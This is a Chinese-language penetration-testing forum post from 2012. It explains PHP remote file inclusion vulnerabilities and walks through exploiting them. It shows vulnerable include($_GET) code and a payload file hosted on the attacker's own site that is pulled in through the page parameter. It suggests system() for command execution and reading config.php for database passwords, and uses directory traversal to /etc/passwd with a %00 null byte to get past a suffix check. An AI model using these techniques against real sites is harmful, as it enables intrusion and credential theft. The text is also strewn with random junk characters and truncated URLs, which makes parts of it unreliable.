中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]

作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含
' }/ Y  V  }: Q& C$ k* p# L
php远端档包含漏洞基本' R# T- C6 Q. C* r2 B
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。
' k/ q) ^" |8 J' r7 {本帖隐藏的内容需要回复才可以浏览
* n2 G5 s: C$ e* _8 G首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。* z. e/ e9 U# Z4 o9 |! x
1.找出bug:
& i, o& |- e% r为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
& S5 J! t: f! l3 g如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。2 C. y4 A! w& x3 _
我们先看这个,当用户输入通过后就包含档,也就是- `8 c$ ], s7 `, p& d3 n1 }
if ($_GET) {
* |1 m1 h. x+ ?, ninclude $_GET;
6 r9 f" o1 v# X+ G} else {
, @2 K, ]/ i6 |include "home.php";
) Z3 [4 C+ G: f6 ?8 ^$ X}6 m' b* K; k. x8 f: p. p$ q
这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
* U+ u# ]" x* s  y6 J2.测试1 U+ d3 [: f! Z8 C
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的4 e; H( I* d( v1 I, i
http://www.target.com/explame.php?page=zizzy, r; d8 l; q  g" t, H# o
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 30 m$ U3 {7 `/ {- L& ]' ^3 ]
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
% n4 a1 J5 E: Wphp输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。) ?. N- w! N  W& ^
3.利用
7 O- R( X1 u$ s; v* {php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样
" _9 j7 {6 n6 A/ g<?- C8 E# u; P: u/ L/ }0 ~- t. ]
echo "Wow,test!";
' h$ [% C7 u& c. l5 ~! P$ h2 a* p?>5 P+ }+ D6 ~( j" @" E* }
那么http://www.target.com/explame.php?pa...e.com/yeah.txt* X; y5 ]% p+ E% n2 i4 H
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。1 ~3 n- |* @/ e' a: |8 u; _9 C$ z
4.另一种3 S$ I: U8 I1 d7 S  Y
有时程式师换种写法,写成这样,限制了包含范围
2 G7 i* c0 R# d5 s: v& h+ U( @if ($_GET) {
9 i6 S% |: q) E( r. l# e8 x+ _include "$_GET.php";; X0 c* Z: g! l6 l# d4 X
} else {, N6 `& z4 F' c, J& _2 R+ i/ I/ m  Y
include "home.php";
7 B$ Z: w7 Y0 U$ `1 p7 x}
7 U4 U+ n% v- a& F3 o3 q我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt% _5 d/ [; r1 S0 m
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3" A, p* N* @" `, U) l
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 38 T8 f- f) ?& t9 L$ S8 o$ l& r
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
4 o9 }) T0 ]3 ^! P. F! i那passwd怎么办7 r, L8 U7 [! `
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3: V/ Q6 \. f2 O
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
+ X, ~! z, q4 P% B$ e在这里使用个NUL字元,也就是%00来跳过检测$ ?/ O# y2 C( a8 X1 J8 q+ n! @
http://www.target.com/explame.php?pa.../etc/passwd%00 6 `3 _) L: W1 s" ?8 [9 E' I+ J





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2